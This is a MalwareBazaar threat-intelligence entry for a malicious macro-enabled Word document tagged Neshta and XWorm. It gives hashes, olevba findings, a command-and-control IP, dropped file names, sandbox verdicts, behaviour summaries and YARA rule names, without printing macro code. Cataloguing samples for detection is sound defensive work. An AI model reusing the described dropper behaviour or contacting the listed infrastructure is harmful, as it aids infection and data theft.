MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Neshta


Vendor detections: 12


Maldoc score: 21


Intelligence 12 IOCs YARA 8 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5
SHA3-384 hash: 2ee1b3026a45f97333030cb4e0f1c6b683948a7e85451b9f22617e0f949a29380832d842b40e2eb31580444f9133e3e0
SHA1 hash: fce3fba907a3f90c9e8b12c07acd2d425f63c99a
MD5 hash: a3e4e2316df53998a2c6880091610713
humanhash: south-april-pip-alaska
File name:Draft PO Contract Agreement.docm
Download: download sample
Signature Neshta
Create hunting rule
File size:16'198 bytes
First seen:2024-03-02 17:29:24 UTC
Last seen:Never
File type:Word file docm
MIME type:application/vnd.openxmlformats-officedocument.wordprocessingml.document
ssdeep 384:/imt83c45meRs7GsfIumMC78M2q26akwLWdxdVlwEBJTE:/LZNeRxsfu8M2q7akw6LV77E
TLSH T17272BF3CCB11FC61E293417B922E0AE1F36D1203839C3DAF1889BA98D655687179E7CD
TrID 53.0% (.DOCM) Word Microsoft Office Open XML Format document (with Macro) (52000/1/9)
23.9% (.DOCX) Word Microsoft Office Open XML Format document (23500/1/4)
17.8% (.ZIP) Open Packaging Conventions container (17500/1/4)
4.0% (.ZIP) ZIP compressed archive (4000/1)
1.0% (.PG/BIN) PrintFox/Pagefox bitmap (640x800) (1000/1)
Reporter abuse_ch
Tags:docm Neshta

Office OLE Information

This malware samples appears to be an Office document. The following table provides more information about this document using oletools and oledump.

OLE id
Maldoc score: 21
OLE dump

MalwareBazaar was able to identify 6 sections in this file using oledump:

Section IDSection sizeSection name
A1371 bytesPROJECT
A241 bytesPROJECTwm
A33231 bytesVBA/ThisDocument
A42543 bytesVBA/_VBA_PROJECT
A5514 bytesVBA/dir
OLE vba

MalwareBazaar was able to extract and deobfuscate VBA script(s) the following information from OLE objects embedded in this file using olevba:

TypeKeywordDescription
AutoExecAutoOpenRuns when the Word document is opened
IOC107.175.3.10IPv4 address
IOCApex_Vortex_20240229Executable file name
SuspiciousOpenMay open a file
SuspiciouswriteMay write to a file (if combined with Open)
SuspiciousbinaryMay read or write a binary file (if combined with Open)
SuspiciousADODB.StreamMay create a text file
SuspiciousSaveToFileMay create a text file
SuspiciousShellMay run an executable file or a system command
SuspiciousvbNormalFocusMay run an executable file or a system command
SuspiciousCreateMay execute file or a system command through WMI
SuspiciousCreateObjectMay create an OLE object
SuspiciousHex StringsHex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)

Intelligence

File Origin
# of uploads :
1
# of downloads :
1'977
Origin country :
NL NL
Vendor Threat Intelligence
Verdict:
Malicious
File type:
application/octet-stream
Has a screenshot:
False
Contains macros:
False
Detection(s):
TwinWave.EvilDoc.PDATARootDown.20220203.UNOFFICIAL
Create hunting rule

Doc.Dropper.Agent-6412232-1
Create hunting rule

TwinWave.EvilDoc.PublicDottedQuadDLrRunLikeHell.20210223.UNOFFICIAL
Create hunting rule

TwinWave.EvilDoc.PDATARootDown.20210830.UNOFFICIAL
Create hunting rule

TwinWave.EvilDoc.DLAndDetonateBlameMe.20220110.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malware
Maliciousness:

Behaviour
Searching for the window
Creating a window
Сreating synchronization primitives
Using the Windows Management Instrumentation requests
Creating a file
Creating a file in the %temp% subdirectories
Changing an executable file
Modifying an executable file
DNS request
Connection attempt
Sending a custom TCP request
Connection attempt to an infection source by exploiting the app vulnerability
Sending a TCP request to an infection source by exploiting the app vulnerability
Creating a process from a recently created file
Infecting executable files
Result
Verdict:
Malicious
File Type:
Word File with Macro
Link:
https://app.docguard.net/a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5/results/dashboard
Payload URLs
URL
File name
107.175.3.10
ThisDocument
Behaviour
BlacklistAPI detected
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-vm dropper expand fingerprint lolbin macros macros-on-open phishing redcap remote shell32
Link:
https://www.filescan.io/uploads/65e3621d5382d6240abe5f7f/reports/f8fe6398-c91e-4008-9c3a-5213dd8b731d/overview
Verdict:
Malicious
Labled as:
Valyria
Link:
https://www.hybrid-analysis.com/sample/a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5
Gathering data
Result
Verdict:
MALICIOUS
Link:
https://labs.inquest.net/dfi/sha256/a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5
Details
Macro with Startup Hook
Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.
Macro with File System Write
Detected macro logic that can write data to the file system.
IPv4 Dotted Quad URL
A URL was detected referencing a direct IP address, as opposed to a domain name.
Macro Contains Suspicious String
Detected a macro with a suspicious string. Suspicious strings include privileged function calls, obfuscations, odd registry keys, etc...
Result
Threat name:
Neshta, XWorm
Create hunting rule
Detection:
malicious
Classification:
spre.troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1401936
Signature
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Creates an undocumented autostart registry key
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Document exploit detected (process start blacklist hit)
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Drops PE files with a suspicious file extension
Found malware configuration
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office process drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Searches for Windows Mail specific files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Snort IDS alert for network traffic
Yara detected Neshta
Yara detected XWorm
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1401936 Sample: Draft PO Contract Agreement.docm Startdate: 02/03/2024 Architecture: WINDOWS Score: 100 72 Snort IDS alert for network traffic 2->72 74 Multi AV Scanner detection for domain / URL 2->74 76 Found malware configuration 2->76 78 26 other signatures 2->78 7 WINWORD.EXE 292 17 2->7         started        12 svchost.com 1 2->12         started        14 svchost.com 2->14         started        process3 dnsIp4 56 107.175.3.10, 443, 49162, 49169 AS-COLOCROSSINGUS United States 7->56 38 C:\...\Apex_Vortex_20240229085748832.exe, PE32 7->38 dropped 80 Document exploit detected (creates forbidden files) 7->80 16 Apex_Vortex_20240229085748832.exe 5 7->16         started        40 C:\Windows\directx.sys, ASCII 12->40 dropped 82 Multi AV Scanner detection for dropped file 12->82 84 Sample is not signed and drops a device driver 12->84 20 system.exe 12->20         started        23 system.exe 14->23         started        file5 signatures6 process7 dnsIp8 30 C:\Windows\svchost.com, PE32 16->30 dropped 32 C:\...\Apex_Vortex_20240229085748832.exe, PE32+ 16->32 dropped 34 C:\ProgramData\...\vcredist_x86.exe, PE32 16->34 dropped 36 81 other malicious files 16->36 dropped 64 Multi AV Scanner detection for dropped file 16->64 66 Creates an undocumented autostart registry key 16->66 68 Drops PE files with a suspicious file extension 16->68 70 3 other signatures 16->70 25 Apex_Vortex_20240229085748832.exe 1 6 16->25         started        44 webwsasnmaprdipv46.suninggslb.cn 20->44 46 shed.dual-low.part-0012.t-0009.t-msedge.net 20->46 52 9 other IPs or domains 20->52 48 172.67.17.71, 443, 49182 CLOUDFLARENETUS United States 23->48 50 webwsasnmaprdipv46.suninggslb.cn 23->50 54 10 other IPs or domains 23->54 file9 signatures10 process11 dnsIp12 58 104.219.238.14, 49170, 7000 DATAWAGONUS United States 25->58 60 part-0012.t-0009.t-msedge.net 13.107.246.40, 443, 49165, 49173 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 25->60 62 11 other IPs or domains 25->62 42 C:\ProgramData\system.exe, PE32+ 25->42 dropped 86 Multi AV Scanner detection for dropped file 25->86 88 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 25->88 file13 signatures14
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5/
Threat name:
Document-Word.Trojan.Valyria
Create hunting rule
Status:
Malicious
First seen:
2024-02-29 17:25:41 UTC
File Type:
Document
Extracted files:
20
AV detection:
18 of 24 (75.00%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=u2hxnrjquuo523r4ngb7eaqfjlsgeuykwqh52fxkitx7tlyc2pcq._file
Result
Malware family:
neshta
Create hunting rule
Score:
  10/10
Tags:
family:neshta macro persistence spyware stealer
Link:
https://tria.ge/reports/240302-v25wgsfd7z/
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies registry class
Script User-Agent
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Office loads VBA resources, possible macro or embedded object present
Enumerates physical storage devices
Drops file in Program Files directory
Drops file in Windows directory
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Modifies system executable filetype association
Reads user/profile data of web browsers
Downloads MZ/PE file
Detect Neshta payload
Neshta
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:BitcoinAddress
Create hunting rule
Author:Didier Stevens (@DidierStevens)
Description:Contains a valid Bitcoin address
Rule name:DebuggerCheck__API
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerException__SetConsoleCtrl
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:maldoc_getEIP_method_1
Create hunting rule
Author:Didier Stevens (https://DidierStevens.com)
Rule name:malware_shellcode_hash
Create hunting rule
Author:JPCERT/CC Incident Response Group
Description:detect shellcode api hash value
Rule name:meth_get_eip
Create hunting rule
Author:Willi Ballenthin
Rule name:office_document_vba
Create hunting rule
Author:Jean-Philippe Teissier / @Jipe_
Description:Office document with embedded VBA
Reference:https://github.com/jipegit/
Rule name:vbaproject_bin
Create hunting rule
Author:CD_R0M_
Description:{76 62 61 50 72 6f 6a 65 63 74 2e 62 69 6e} is hex for vbaproject.bin. Macros are often used by threat actors. Work in progress - Ran out of time

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

Neshta

Word file docm a68f76c530a51ddd6e3c6983f202054ae462530ab40fdd16ea44eff9af02d3c5

(this sample)

  
Delivery method
Distributed via e-mail attachment

Comments